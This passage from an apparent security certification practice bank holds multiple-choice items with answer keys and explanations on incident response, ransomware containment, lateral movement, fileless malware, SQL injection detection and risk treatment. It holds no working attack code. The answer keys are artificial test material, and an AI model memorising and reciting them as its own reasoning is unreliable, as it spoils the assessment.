Option A is wrong because spyware typically focuses on data collection and does not inherently possess the capability to hide processes or sockets from netstat and EDR; its stealth is usually limited to user-level concealment, not kernel-level hooking. Option C is wrong because ransomware is designed to encrypt files and demand payment, not to persistently hide processes or sockets; its primary goal is disruption, not stealthy persistence. Option D is wrong because a logic bomb is a dormant piece of code triggered by a specific condition (e.g., date or event), not a persistent, actively hiding malware that survives reboot and evades process enumeration.

648
MCQhard

Based on the exhibit, what is the best eradication decision after containment? A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.

A.Delete only the update.exe file and reconnect the host once the user confirms it is working.
B.Remove persistence artifacts and rebuild the endpoint from a known-good image before returning it to service.
C.Restore network connectivity now because no encryption was observed.
D.Change the DNS servers for the entire enterprise to block the malware domain.
AnswerB

The host contains a malicious executable plus two persistence mechanisms, so cleanup must remove more than the payload file. Reimaging from trusted media provides the most reliable eradication path, especially when the malware family is already identified and the machine has been quarantined. This reduces the chance of hidden remnants, registry persistence, or tampered system components surviving the response effort.

Why this answer

Option B is correct because after containment (network isolation and memory preservation), the best eradication step is to remove all persistence mechanisms (startup item and scheduled task) and rebuild the endpoint from a known-good image. This ensures that any undetected malware remnants, rootkits, or hidden artifacts are eliminated, preventing reinfection. Simply deleting files or changing DNS does not guarantee the system is clean, and reconnecting without a full rebuild risks lateral movement or data exfiltration.

Exam trap

The trap here is that candidates may choose Option A, thinking that deleting the malicious file is sufficient, but CompTIA emphasizes that persistence artifacts must be removed and a system should be rebuilt from a trusted image to ensure complete eradication.

How to eliminate wrong answers

Option A is wrong because deleting only the update.exe file leaves the scheduled task and startup item intact, and the user's confirmation of functionality does not verify security; the host could still have hidden persistence or other malware. Option C is wrong because restoring network connectivity without eradication ignores the possibility of dormant malware or backdoors, and the absence of encryption does not indicate the system is safe. Option D is wrong because changing enterprise DNS servers is a containment or mitigation step, not an eradication decision; it does not clean the compromised endpoint and may disrupt legitimate traffic.

649
MCQeasy

A support portal searches customer records by last name. When a tester enters a single quote into the search field, the application returns a database syntax error. Which attack is most likely possible?

A.SQL injection, because the input may be altering the database query
B.Cross-site scripting, because the page is executing malicious JavaScript in the browser
C.Server-side request forgery, because the server is making internal network calls
D.Cross-site request forgery, because the user is being tricked into submitting a form
AnswerA

A quote causing a database syntax error is a classic sign that user input may be breaking SQL queries.

Why this answer

The single quote character is a common SQL injection test payload. When it triggers a database syntax error, it confirms that the input is being directly concatenated into a SQL query without proper sanitization or parameterization. This allows an attacker to break out of the intended query structure and execute arbitrary SQL commands, making SQL injection the most likely attack.

Exam trap

The trap here is that candidates may confuse a database syntax error with a client-side script error, leading them to choose cross-site scripting, but the error message originates from the database server, not the browser.

How to eliminate wrong answers

Option B is wrong because cross-site scripting (XSS) requires the application to reflect or store user input as executable JavaScript in the browser, not cause a server-side database syntax error. Option C is wrong because server-side request forgery (SSRF) involves the server making unintended HTTP requests to internal resources, not manipulating database queries. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into submitting a malicious request, but the error here is a direct database syntax error from input, not a forged request from another site.

650
Multi-Selecthard

A scan returns five findings. Which two should be remediated first based on real-world risk? Select two. A) Internet-facing SSO gateway, CVSS 8.8, public exploit code, and auth bypass impact. B) Internal print server, CVSS 9.8, no known exploit, isolated VLAN, no sensitive data. C) File server with regulated customer records, CVSS 6.5, active exploitation in the wild, reachable from VPN. D) Lab hypervisor, CVSS 7.5, no exploit, scheduled retirement next month, used only by testers. E) Dev wiki, CVSS 5.0, no exploit, no sensitive data.

Select 2 answers
A.Internet-facing SSO gateway with public exploit code and authentication-bypass impact.
B.Internal print server on an isolated VLAN with no known exploit and no sensitive data.
C.File server containing regulated customer records, with active exploitation in the wild and VPN reachability.
D.Lab hypervisor that is scheduled for retirement next month and used only by testers.
E.Development wiki with low severity, no exploit, and no sensitive data.
AnswersA, C

This is a top-priority remediation because the system is internet-facing, has publicly available exploit code, and can lead to authentication bypass. In practice, exposure and exploitability often outweigh CVSS alone because a compromised SSO service can become a foothold for broad lateral movement and account takeover across many systems.

Why this answer

Option A is correct because the SSO gateway is internet-facing, has a CVSS 8.8 with public exploit code, and an authentication-bypass impact. This combination means an attacker can gain unauthorized access to all federated applications without credentials, representing a critical risk that must be remediated immediately.

Exam trap

The trap here is that candidates often prioritize the highest CVSS score (9.8) without considering compensating controls like network isolation, lack of exploit code, or data sensitivity, which can drastically reduce real-world risk.

651
MCQeasy

A user reports a ransomware note on one department file share, but other departments are still working normally. What is the best first containment action?

A.Shut down the entire company network immediately.
B.Disconnect the affected file share or server from the network.
C.Delete the ransom note and wait to see whether the problem returns.
D.Restore the share immediately before checking what caused the incident.
AnswerB

Isolating the affected system is the best first containment step because it helps stop the malware from spreading while preserving the rest of the environment. The goal in early incident response is to reduce impact quickly without causing unnecessary downtime. Once contained, responders can investigate scope, preserve evidence, and begin eradication and recovery.

Why this answer

Option B is correct because the immediate priority in a ransomware incident is to contain the threat by isolating the affected system to prevent lateral movement. Disconnecting the file share or server from the network stops the ransomware from encrypting additional files or spreading to other departments via SMB or other protocols. This aligns with the NIST SP 800-61 containment strategy, which emphasizes rapid isolation without disrupting unaffected systems.

Exam trap

The trap here is that candidates may choose Option A (full network shutdown) because they think it is the safest action, but the exam emphasizes precise, least-disruptive containment that preserves evidence and limits business impact.

How to eliminate wrong answers

Option A is wrong because shutting down the entire company network is overly disruptive, may destroy volatile evidence (e.g., memory-resident malware), and is unnecessary when only one department is affected. Option C is wrong because deleting the ransom note does not remove the ransomware executable or prevent further encryption; it ignores the active threat and wastes critical response time. Option D is wrong because restoring the share without first containing the incident risks immediate re-infection, as the ransomware may still be active on the network or the restored files could be re-encrypted.

652
MCQmedium

A business owner asks whether to proceed with a medium-risk issue on an internal reporting system. The vulnerability is unlikely to be exploited because the system is reachable only from a segmented admin network, and no sensitive data is stored there. The owner wants to postpone remediation until the next planned upgrade window. Which risk treatment is being chosen?

A.Risk avoidance, because the system will be upgraded later.
B.Risk acceptance, because the business is choosing to live with the remaining risk for now.
C.Risk transfer, because the upgrade window shifts responsibility to the vendor.
D.Risk escalation, because the issue is being sent to the help desk for tracking.
AnswerB

This is the correct treatment because leadership is knowingly accepting the residual risk until the planned upgrade.

Why this answer

Option B is correct because risk acceptance is the deliberate decision to acknowledge and tolerate a risk without immediate remediation. In this scenario, the business owner understands the vulnerability is low-likelihood (segmented admin network, no sensitive data) and chooses to postpone fixing it until the next planned upgrade, thereby accepting the residual risk for that period.

Exam trap

Cisco often tests the distinction between risk acceptance and risk avoidance, where candidates mistakenly think postponing remediation equals avoidance rather than a conscious decision to live with the risk temporarily.

How to eliminate wrong answers

Option A is wrong because risk avoidance would mean eliminating the risk entirely (e.g., removing the system or blocking all access), not merely postponing remediation to a later upgrade. Option C is wrong because risk transfer shifts financial liability to a third party (e.g., purchasing cyber insurance or outsourcing), not delaying an internal fix. Option D is wrong because risk escalation involves formally notifying higher management or a risk committee to decide on a response, not simply sending a ticket to the help desk for tracking.

653
MCQmedium

A SIEM correlates three failed MFA prompts for a payroll admin account from one IP, a successful login two minutes later from the same IP, and a new mailbox forwarding rule to an external address. What is the best immediate action?

A.Reset the password and leave the account enabled so the user can keep working.
B.Disable the account and revoke active sessions and tokens.
C.Delete the forwarding rule and monitor the account for a few hours.
D.Wait for the user to confirm the login before taking any action.
AnswerB

This is the best immediate containment step because the signs strongly indicate account compromise. Disabling the account stops new authentication, while revoking sessions and tokens cuts off any already-established access that could continue to act as the user. That combination contains the incident quickly and limits further mailbox manipulation, data theft, or privilege misuse while the team investigates logs and confirms scope.

Why this answer

Option B is correct because the combination of failed MFA prompts followed by a successful login and immediate creation of an external mailbox forwarding rule is a classic indicator of account compromise (e.g., adversary-in-the-middle or token theft). Disabling the account and revoking active sessions and tokens stops the attacker from maintaining access and prevents further data exfiltration via the forwarding rule, which is the most urgent containment step in incident response.

Exam trap

CompTIA often tests the misconception that deleting the malicious artifact (forwarding rule) is sufficient, when in reality the priority is to contain the compromised account by disabling it and revoking all sessions.

How to eliminate wrong answers

Option A is wrong because resetting the password alone does not invalidate active sessions or tokens, allowing the attacker to continue using existing authenticated sessions. Option C is wrong because deleting only the forwarding rule without disabling the account leaves the attacker with continued access to the mailbox and the ability to recreate the rule or perform other malicious actions. Option D is wrong because waiting for user confirmation delays containment, giving the attacker more time to exfiltrate data or establish persistence, and the user may not be aware of the compromise.

654
MCQmedium

A company wants to stop employees from running unauthorized tools downloaded from the internet on managed Windows laptops, but still allow approved internal apps and vendor-updated software. Which control is best?

A.Application control using an allowlist for approved executables and publishers.
B.Full-disk encryption on every laptop before deployment.
C.A stronger screen-lock timeout and automatic logoff policy.
D.A firmware password for the BIOS without any other endpoint restrictions.
AnswerA

Allowlisting blocks unapproved software while still permitting known-good internal and vendor-signed applications.

Why this answer

Application control with an allowlist (also known as whitelisting) is the correct choice because it explicitly defines which executables, scripts, and publishers are permitted to run on managed Windows laptops. This prevents unauthorized tools downloaded from the internet from executing, while allowing approved internal apps and vendor-updated software that match the allowlist criteria. Technologies like Windows Defender Application Control (WDAC) or AppLocker enforce this by checking file hashes, publisher signatures, or path rules at runtime.

Exam trap

The trap here is that candidates often confuse data-at-rest protection (encryption) or session management (screen lock) with application execution control, mistakenly thinking they can prevent unauthorized software from running, when in fact they address entirely different security domains.

How to eliminate wrong answers

Option B is wrong because full-disk encryption (e.g., BitLocker) protects data at rest from unauthorized access if the laptop is lost or stolen, but it does not control which applications can run on the device; it has no mechanism to block execution of unauthorized tools. Option C is wrong because a stronger screen-lock timeout and automatic logoff policy addresses session security and unauthorized physical access, but it does not prevent a user from running downloaded executables while logged in; it has no application execution control capability.

655
MCQmedium

Employees authenticate once to a corporate portal and then open the help desk, payroll, and documentation apps without logging in again. The apps rely on tokens from the company's identity provider instead of storing separate passwords. What is being implemented?

A.Password synchronization between every application in the suite.
B.Federated single sign-on using the corporate identity provider.
C.Shared guest accounts for all employees on the portal.
D.Split tunneling through a VPN to speed up application access.
AnswerB

Correct. Federated SSO lets the identity provider authenticate the user once and then issue tokens or assertions that other trusted applications accept. This improves usability while reducing password sprawl and lowering the number of credentials stored by individual services. It is a standard enterprise pattern for accessing multiple apps with one login session.

Why this answer

The scenario describes single sign-on (SSO) where the corporate identity provider (IdP) issues tokens (e.g., SAML assertions, OIDC ID tokens) after initial authentication. The help desk, payroll, and documentation apps are configured as service providers that trust the IdP, so they accept the token instead of requiring separate credentials. This is federated SSO because the apps rely on a central identity provider rather than sharing password databases or synchronizing passwords.

Exam trap

The trap here is that candidates confuse 'federated single sign-on' with 'password synchronization' (Option A), because both reduce the number of logins, but federation uses tokens and trust relationships, not shared or synced passwords.

How to eliminate wrong answers

Option A is wrong because password synchronization would replicate the same password across each application's local credential store, which is not what occurs—the apps never receive or store the user's password; they rely on tokens from the IdP. Option C is wrong because shared guest accounts would violate individual accountability and audit trails, and the scenario describes employees authenticating individually, not using a common account. Option D is wrong because split tunneling is a VPN routing technique that allows some traffic to bypass the VPN tunnel for performance; it has nothing to do with authentication or token-based access to applications.

656
MCQmedium

NetFlow shows one user workstation making authenticated SMB and WinRM connections to more than 40 internal hosts within 15 minutes, starting shortly after the user opened a spreadsheet attachment. No approved admin tool was running on the device. What is the best initial response?

A.Treat the traffic as normal because the workstation used valid credentials
B.Isolate the workstation and begin investigating for credential compromise or lateral movement
C.Increase the DHCP lease time to reduce network noise
D.Block all SMB and WinRM traffic across the entire enterprise
AnswerB

Rapid east-west access from a single workstation is a strong sign of compromise, so containment and investigation should start immediately.

Why this answer

The sudden burst of authenticated SMB and WinRM connections from a single workstation to over 40 internal hosts immediately after opening a spreadsheet attachment is a classic indicator of lateral movement using stolen credentials. Since no approved admin tool was running, this behavior strongly suggests the user's credentials have been compromised, likely via a macro or exploit in the attachment, and an attacker is using those protocols to move laterally. Isolating the workstation stops the attack in progress and preserves evidence for forensic investigation.

Exam trap

The trap here is that candidates see 'authenticated' and assume the traffic is legitimate, missing that attackers use valid stolen credentials to authenticate, making authentication alone an unreliable indicator of safety.

How to eliminate wrong answers

Option A is wrong because valid credentials do not make the traffic normal; attackers commonly use stolen credentials to authenticate and move laterally, so authentication alone does not indicate legitimate activity. Option C is wrong because increasing the DHCP lease time does not address the security incident; it would only extend IP address assignments and has no effect on SMB/WinRM lateral movement. Option D is wrong because blocking all SMB and WinRM traffic enterprise-wide would disrupt legitimate administrative and file-sharing operations, and is an overly broad, reactive measure that does not isolate the specific compromised host or investigate the root cause.

657
MCQhard

Based on the exhibit, what is the best fix so role changes take effect promptly without waiting for token expiration?

A.Increase the token lifetime so users reauthenticate less often during the workday.
B.Perform authorization checks against current directory data on each privileged request.
C.Store the JWT in a browser cookie so it refreshes automatically when roles change.
D.Disable MFA and rely only on the role claim inside the token.
AnswerB

This is the best fix because the problem is stale authorization, not failed authentication. The app is trusting a role claim that was correct at sign-in but became outdated after the HR change. Checking current directory data, or re-evaluating authorization on each sensitive action, ensures access follows the user's current status instead of an old token snapshot.

Why this answer

Option B is correct because performing authorization checks against current directory data (e.g., via LDAP or a policy decision point) on each privileged request ensures that role changes are enforced immediately, regardless of JWT token lifetime. This decouples authentication (token validity) from authorization (current role membership), allowing dynamic updates without waiting for token expiration or reauthentication.

Exam trap

The trap here is that candidates assume storing a JWT in a cookie or increasing token lifetime will somehow make role changes take effect, when in fact neither alters the static nature of the token's claims without a reissue or runtime authorization check.

How to eliminate wrong answers

Option A is wrong because increasing token lifetime would delay the effect of role changes even further, as users would hold stale tokens for longer periods. Option C is wrong because storing a JWT in a browser cookie does not automatically refresh its claims when roles change; the token itself remains unchanged until a new one is issued, and cookies do not trigger reauthorization. Option D is wrong because disabling MFA weakens security and does not address the core issue of stale role claims; the role claim inside the token would still be static until the token expires or is refreshed.

658
MCQmedium

A SOC analyst confirms that a critical Linux virtual machine is making outbound connections to a known malicious IP address. The application owner says the VM hosts a revenue system that cannot be powered off without causing a major outage. What is the best containment action?

A.Shut down the VM immediately to stop all malicious activity.
B.Isolate the VM at the network layer while keeping it powered on.
C.Wait for the next maintenance window before taking action.
D.Reimage the VM from a known-good template immediately.
AnswerB

This reduces further attacker communication and spread while preserving the system state for investigation and minimizing business disruption.

Why this answer

Option B is correct because network isolation (e.g., applying a firewall ACL or moving the VM to a quarantine VLAN) stops outbound malicious traffic while keeping the revenue-critical system powered on and available for forensic analysis. This balances security containment with business continuity, as shutting down the VM (Option A) would cause a major outage, and waiting (Option C) would allow continued data exfiltration or lateral movement.

Exam trap

The trap here is that candidates may assume immediate shutdown is always the best containment action, but the exam tests the ability to prioritize business continuity while still containing the threat through network-layer isolation.

How to eliminate wrong answers

Option A is wrong because immediately shutting down the VM would cause a major outage for the revenue system, violating the requirement to avoid disruption, and it would destroy volatile forensic evidence (e.g., memory, active connections). Option C is wrong because waiting for the next maintenance window allows the malicious outbound connections to continue, risking data exfiltration, further compromise, or lateral movement to other systems.

659
MCQmedium

Based on the exhibit, which finding is the best candidate for immediate remediation or emergency mitigation?

A.VPN-EDGE01, because a critical internet-facing RCE with public exploit code has the highest risk.
B.FILE-02, because file servers often affect many users and should always come before perimeter systems.
C.TEST-VM-17, because any high-severity issue deserves the fastest response regardless of exposure.
D.PRINTER-3F, because default credentials are the easiest issue to exploit and therefore the most dangerous.
AnswerA

VPN-EDGE01 combines severity, exposure, and exploit availability. A critical remote code execution flaw on an internet-facing device is the most urgent because attackers can reach it directly from outside the organization. Public proof-of-concept code further lowers the effort needed to exploit it. When prioritizing vulnerabilities, this combination usually receives immediate remediation or emergency mitigation.

Why this answer

Option A is correct because VPN-EDGE01 is an internet-facing device with a critical remote code execution (RCE) vulnerability that has public exploit code available. This combination of high severity, network exposure, and weaponized exploit makes it the highest risk and most urgent for immediate remediation or emergency mitigation.

Exam trap

The trap here is that candidates may prioritize by severity alone (high vs. critical) or by ease of exploitation (default credentials), ignoring the critical factor of network exposure and the presence of public exploit code, which together create the highest immediate risk.

How to eliminate wrong answers

Option B is wrong because file servers, while affecting many users, do not inherently present a higher risk than an internet-facing device with a critical RCE; prioritizing by user count over exposure and exploitability is a common prioritization error. Option C is wrong because a high-severity issue on a non-internet-facing test VM (TEST-VM-17) is less urgent than a critical RCE on an internet-facing edge device, as the test VM has limited exposure and lower likelihood of exploitation. Option D is wrong because default credentials on a printer (PRINTER-3F), while easily exploitable, typically have limited impact compared to a critical RCE on a perimeter VPN gateway that could lead to full network compromise.

660
Matchingmedium

Match each data example to the most appropriate classification label. 1. A public marketing flyer approved for external posting. 2. An internal org chart and office directory meant only for employees. 3. A customer case file with contact details and order history. 4. A vault export containing API keys and encryption secrets.

Drag a concept onto its matching description — or click a concept then click the description.

Concepts
Matches

Public

Internal

Confidential

Restricted

Why these pairings

These matches follow a typical data classification scheme: Public for non-sensitive info, Internal for company-only data, Confidential for customer PII, and Restricted for highly sensitive secrets.

661
MCQmedium

After a routine dependency update, a development team notices that the customer portal begins making outbound connections to an unfamiliar domain during startup. The domain is not part of the application design, and the behavior started immediately after the third-party library was updated. Which threat is most likely?

A.Supply-chain compromise
B.Evil twin access point
C.Bluetooth pairing abuse
D.DNS poisoning on the client network
AnswerA

A compromised dependency can introduce malicious behavior through trusted software updates or packages.

Why this answer

The scenario describes a supply-chain compromise, where a trusted third-party library has been maliciously altered to include unauthorized outbound connections. This is a classic software supply-chain attack, as the dependency update introduced code that phones home to an unfamiliar domain, indicating the library's integrity was compromised before or during distribution.

Exam trap

The trap here is that candidates may confuse supply-chain compromise with DNS poisoning, because both involve unexpected outbound connections, but DNS poisoning would affect all network traffic and not be tied to a specific library update.

How to eliminate wrong answers

Option B (Evil twin access point) is wrong because it involves a rogue Wi-Fi access point impersonating a legitimate one to intercept network traffic, which is unrelated to a dependency update triggering outbound connections. Option C (Bluetooth pairing abuse) is wrong because it exploits Bluetooth vulnerabilities for unauthorized access or data exfiltration, not relevant to a third-party library update causing outbound connections. Option D (DNS poisoning on the client network) is wrong because it corrupts DNS cache to redirect traffic to malicious sites, but the behavior started immediately after the library update and targets a specific domain, not a broad redirection of all traffic.

662
MCQmedium

SIEM alerts show one workstation making SMB connections to 30 internal hosts within 10 minutes, followed by remote service creation and repeated access attempts to admin shares. The workstation also begins authenticating with several privileged accounts. What is the most likely activity?

A.A distributed denial-of-service attack launched from a compromised internal host.
B.DNS tunneling used to exfiltrate data through allowed name-resolution traffic.
C.ARP spoofing to redirect local traffic at the network layer.
D.Lateral movement after credential compromise or endpoint takeover.
AnswerD

The workstation is behaving like an attacker foothold that is probing internal systems, using administrative shares, and attempting remote service creation. Those are strong signs of lateral movement after credentials or the device itself have been compromised. The privileged-account authentication attempts also suggest the attacker is trying to expand access and reach higher-value systems inside the environment.

Why this answer

The sequence of SMB connections to many internal hosts, followed by remote service creation and repeated access attempts to admin shares, combined with authentication using privileged accounts, is the classic pattern of lateral movement. This indicates the attacker has already compromised the workstation (endpoint takeover) or obtained valid credentials and is now using SMB and PsExec-like techniques to move laterally across the network, escalate privileges, and establish persistence.

Exam trap

The trap here is that candidates may confuse lateral movement with a DDoS attack because of the many outbound connections, but the key differentiator is the use of admin shares and privileged account authentication, which are hallmarks of post-exploitation lateral movement, not volumetric attacks.

How to eliminate wrong answers

Option A is wrong because a DDoS attack would generate massive traffic to overwhelm a target, not involve targeted SMB connections to admin shares or privileged account authentication. Option B is wrong because DNS tunneling exfiltrates data by encoding it in DNS queries/responses, not by making SMB connections or creating remote services. Option C is wrong because ARP spoofing operates at Layer 2 to intercept traffic on a local subnet, not to perform SMB-based lateral movement or authenticate with multiple privileged accounts across many hosts.

663
MCQmedium

An EDR console shows `mshta.exe` launching `powershell.exe` from a user profile directory, followed by a script that never writes a new executable to disk. Minutes later, the host begins making regular outbound HTTPS connections to an unfamiliar IP address. What type of malware behavior is most likely being observed?

A.Fileless attack
B.Ransomware
C.Worm
D.Rootkit
AnswerA

Fileless attacks rely on built-in tools and memory-resident activity instead of dropping a traditional executable on disk. The use of mshta and PowerShell is a common indicator.

Why this answer

The EDR console shows mshta.exe (a Microsoft binary for executing HTML Applications) launching PowerShell from a user profile directory, followed by a script that never writes a new executable to disk. This is classic fileless malware behavior, where the malicious payload runs entirely in memory (e.g., via PowerShell or .NET reflection) without dropping a file, making it harder for traditional signature-based antivirus to detect. The subsequent outbound HTTPS connections to an unfamiliar IP indicate command-and-control (C2) communication, consistent with a fileless attack that persists only in memory.

Exam trap

The trap here is that candidates may confuse 'fileless' with 'no malware at all' or think it must involve a rootkit, but the key indicator is the absence of a file write combined with in-memory script execution via trusted system binaries.

How to eliminate wrong answers

Option B (Ransomware) is wrong because ransomware typically encrypts files and demands payment, often writing a ransom note to disk and modifying file extensions; the described behavior of never writing an executable to disk and making outbound HTTPS connections is more indicative of a fileless C2 channel, not encryption or extortion. Option C (Worm) is wrong because worms self-propagate across networks without user interaction, often exploiting vulnerabilities or using removable media; the scenario focuses on a single host's in-memory execution and C2 traffic, not lateral movement or replication. Option D (Rootkit) is wrong because rootkits are designed to hide their presence by modifying the operating system kernel or system calls, often persisting via drivers or bootkits; the described behavior of launching PowerShell from mshta.exe and making outbound connections is a user-mode fileless attack, not a kernel-level stealth mechanism.

664
Multi-Selecteasy

After a phishing campaign, several employees entered credentials on a fake login page. Management wants a control that both improves user behavior and gives the security team a way to measure whether click rates are going down. Which two actions best meet that goal? Select two.

Select 2 answers
A.Send a reminder email once a year and stop there
B.Run role-based phishing awareness training
C.Disable all external email for every employee
D.Use simulated phishing exercises with reporting metrics
E.Tell users to ignore suspicious messages unless IT calls first
AnswersB, D

Role-based training helps employees recognize threats that match their actual job responsibilities and exposure.

Why this answer

Role-based phishing awareness training (B) directly improves user behavior by tailoring content to specific job functions, making the training more relevant and effective. Simulated phishing exercises with reporting metrics (D) provide a measurable way for the security team to track click rates over time, enabling data-driven assessment of improvement. Together, they address both behavioral change and quantifiable measurement.

Exam trap

CompTIA often tests the distinction between passive awareness (like annual emails) and active, measurable training (like simulated phishing with metrics), leading candidates to mistakenly select a single control that only addresses one aspect of the goal.

665
MCQeasy

An administrator wants to add a new vendor IP range to a firewall rule in production. What is the best change-management step to reduce risk?

A.Apply the change immediately during peak business hours.
B.Test and approve the change before implementing it in production.
C.Allow the entire vendor subnet permanently without review.
D.Skip documentation to speed up the rollout.
AnswerB

Change management should include review, approval, and testing before production deployment. This reduces the chance of outages, misconfigurations, and unintended access. A controlled change window and validation steps are especially important for firewall rules because small mistakes can break connectivity or create security gaps.

Why this answer

Option B is correct because change management requires testing and approval before applying changes to production systems. Adding a new vendor IP range to a firewall rule without validation could inadvertently allow malicious traffic or block legitimate traffic, leading to a security breach or service disruption. Testing in a non-production environment or using a change window ensures the rule behaves as intended and aligns with the organization's security policy.

Exam trap

The trap here is that candidates may think immediate implementation (Option A) is acceptable for urgent security fixes, but the question specifies adding a new vendor IP range, which is a planned change that must follow proper change management procedures to avoid unintended access or downtime.

How to eliminate wrong answers

Option A is wrong because applying the change immediately during peak business hours violates change management best practices and risks causing outages or security gaps when the network is under heavy load, making rollback difficult. Option C is wrong because allowing the entire vendor subnet permanently without review bypasses the principle of least privilege and could expose the network to unnecessary risk if the vendor's IP range changes or includes untrusted addresses. Option D is wrong because skipping documentation undermines audit trails and incident response; without records, administrators cannot verify what changes were made or revert them if needed.

666
Multi-Selectmedium

A weekly risk review lists several findings. Which two should be addressed first based on likelihood of exploitation and business impact? Select two.

Select 2 answers
A.An internet-facing VPN appliance with a known exploit and no vendor patch available yet.
B.An internal lab system with an outdated browser component, isolated from production and not customer-facing.
C.A public payroll portal that still uses default administrator credentials.
D.A training virtual machine used offline once per month in a disconnected lab.
E.A documentation site with a spelling error in its banner text.
AnswersA, C

Exposure is public, exploitation is likely, and the business impact could be broad if the device is compromised.

Why this answer

Option A is correct because an internet-facing VPN appliance with a known exploit presents a high likelihood of exploitation — attackers actively scan for such vulnerabilities — and the lack of a vendor patch means no immediate mitigation is available, leaving the business exposed to potential data breaches or network compromise. The combination of high exploitability (public-facing, known exploit) and high business impact (VPN access often leads to internal network access) makes this a critical risk that must be addressed first.

Exam trap

CompTIA often tests the concept that default credentials on a public-facing system (Option C) are a critical risk because they are trivially exploitable (no exploit development needed) and directly impact business operations, such as payroll data exposure, making it a top priority alongside unpatched internet-facing appliances.

667
MCQmedium

A file server suddenly shows renamed files with a new extension, users see a ransom note demanding cryptocurrency, and shadow copies are deleted from the host. Which malware family is the best match?

A.Ransomware, because the attacker is encrypting data and demanding payment to restore access.
B.Trojan, because the attack requires a disguised program to install itself.
C.Spyware, because the attacker is likely trying to monitor file activity.
D.Logic bomb, because the malware likely triggered after a specific condition was met.
AnswerA

Ransomware commonly encrypts files, renames them, deletes recovery points, and leaves a payment demand. The combination of locked data and a ransom note is a strong indicator of this malware family.

Why this answer

Ransomware is the correct classification because the scenario describes file encryption (renamed files with new extensions), a ransom note demanding cryptocurrency, and the deletion of shadow copies (Volume Shadow Copy Service snapshots) to prevent file recovery. These are hallmark behaviors of ransomware, specifically crypto-ransomware, which encrypts data and demands payment for decryption keys.

Exam trap

The trap here is that candidates may confuse ransomware with a Trojan because both can be delivered via social engineering, but the defining behaviors of file encryption, ransom note, and shadow copy deletion are unique to ransomware, not generic malware types.

How to eliminate wrong answers

Option B is wrong because a Trojan is a type of malware that disguises itself as legitimate software to gain access, but it does not inherently perform file encryption or demand ransom; the described behaviors are specific to ransomware, not Trojans. Option C is wrong because spyware is designed to monitor user activity and steal information without the user's knowledge, not to encrypt files or display ransom notes; the deletion of shadow copies and file renaming are not spyware characteristics. Option D is wrong because a logic bomb is a piece of code that executes malicious actions when a specific condition is met (e.g., date or user action), but it does not typically involve file encryption, ransom notes, or cryptocurrency demands; the scenario lacks any trigger condition and instead shows active encryption and extortion.

668
MCQeasy

Based on the exhibit, which control would best reduce unauthorized follow-on entry into the records room?

A.Install a mantrap so only one person can pass through at a time.
B.Add more network firewall rules around the records room door.
C.Increase the screen lock timeout on nearby workstations.
D.Replace the UPS batteries to stop unauthorized people from entering.
AnswerA

A mantrap is designed to prevent tailgating and piggybacking by controlling one person through an entry point at a time. The exhibit shows someone followed an authorized employee into a sensitive room after the badge granted access. A mantrap directly addresses that weakness and is a common physical-security control for restricted areas.

Why this answer

A mantrap is a physical security control consisting of a small space with two interlocking doors, designed to allow only one person to pass at a time. This prevents tailgating and piggybacking, which are common methods of unauthorized follow-on entry into a restricted area like a records room.

Exam trap

The trap here is that candidates may confuse logical access controls (firewall rules, screen lock timeouts) or power-related controls (UPS) with physical access controls, failing to recognize that the question specifically targets unauthorized follow-on entry through a physical door.

How to eliminate wrong answers

Option B is wrong because network firewall rules control logical access to network resources, not physical entry through a door. Option C is wrong because increasing the screen lock timeout on workstations reduces the risk of unauthorized logical access to a computer, but does nothing to prevent a person from physically following an authorized user into the records room. Option D is wrong because replacing UPS batteries ensures backup power for equipment, but has no effect on preventing unauthorized physical entry.

669
MCQeasy

A file server begins encrypting documents, and the SOC confirms the activity is malicious. Which incident response step should happen first to limit further damage?

A.Lessons learned
B.Containment
C.Recovery
D.Post-incident reporting
AnswerB

Containment is the first response step that limits spread and stops the incident from getting worse.

Why this answer

Containment is the correct first step because it isolates the compromised file server from the network, preventing the ransomware from encrypting additional shares or spreading laterally. The SMB protocol (port 445) used for file sharing would be blocked at the switch or firewall, halting further encryption of documents. This aligns with the NIST SP 800-61 incident response lifecycle, where containment precedes eradication and recovery.

Exam trap

CompTIA often tests the misconception that recovery (e.g., restoring from backup) is the first priority, but containment must come first to stop the active damage and prevent reinfection.

How to eliminate wrong answers

Option A is wrong because lessons learned occurs after the incident is fully resolved, not during active encryption. Option C is wrong because recovery (e.g., restoring from backups) cannot happen until the threat is contained and eradicated; attempting recovery first could re-encrypt data. Option D is wrong because post-incident reporting is a final step for documentation and compliance, not an immediate action to limit damage.

670
MCQmedium

During malware containment, an analyst needs to preserve transient information from a compromised Windows workstation that is still running. Which action is MOST appropriate before shutdown or imaging?

A.Capture memory and live process information with approved response tools
B.Immediately unplug the workstation and carry it to the evidence room
C.Run a full antivirus scan to clean the machine before analysis
D.Clear the event logs so the malicious activity is easier to isolate
AnswerA

Live memory and process data can disappear on shutdown, so capturing them preserves valuable forensic evidence.

Why this answer

Option A is correct because transient information such as running processes, network connections, and memory-resident malware is lost when the system is powered off. Capturing memory and live process data with approved forensic tools (e.g., FTK Imager, DumpIt, or WinPmem) preserves volatile evidence critical for incident analysis and attribution, in accordance with the order of volatility (RFC 3227).

Exam trap

The trap here is that candidates may think immediate power-off preserves evidence, but it actually destroys volatile data, which is the most time-sensitive and valuable for incident response.

How to eliminate wrong answers

Option B is wrong because immediately unplugging the workstation causes a loss of volatile data (memory, network connections, running processes) and may corrupt the file system, destroying transient evidence. Option C is wrong because running a full antivirus scan modifies the system state, potentially deleting or altering malware artifacts and violating forensic integrity principles. Option D is wrong because clearing event logs destroys historical evidence of malicious activity, making it harder to reconstruct the attack timeline and violating the preservation of evidence.

671
Multi-Selecteasy

Which two actions are examples of accounting in AAA? Select two.

Select 2 answers
A.Recording successful logons in a security log
B.Checking a username and password before access
C.Tracking which files a user opened during a session
D.Granting access to the finance folder
E.Requiring a fingerprint and a password
AnswersA, C

Logging logons creates an audit trail, which is a core accounting function.

Why this answer

Option A is correct because accounting in AAA involves recording user activities, such as successful logons, in a security log. This provides an audit trail for monitoring and compliance. Option C is correct because tracking which files a user opened during a session is a form of accounting that logs resource access for accountability and usage analysis.

Exam trap

CompTIA often tests the distinction between authentication (verifying identity), authorization (granting permissions), and accounting (logging actions), so the trap here is confusing authorization actions (like granting folder access) or authentication methods (like multifactor) with accounting, which only records events after they occur.

672
MCQmedium

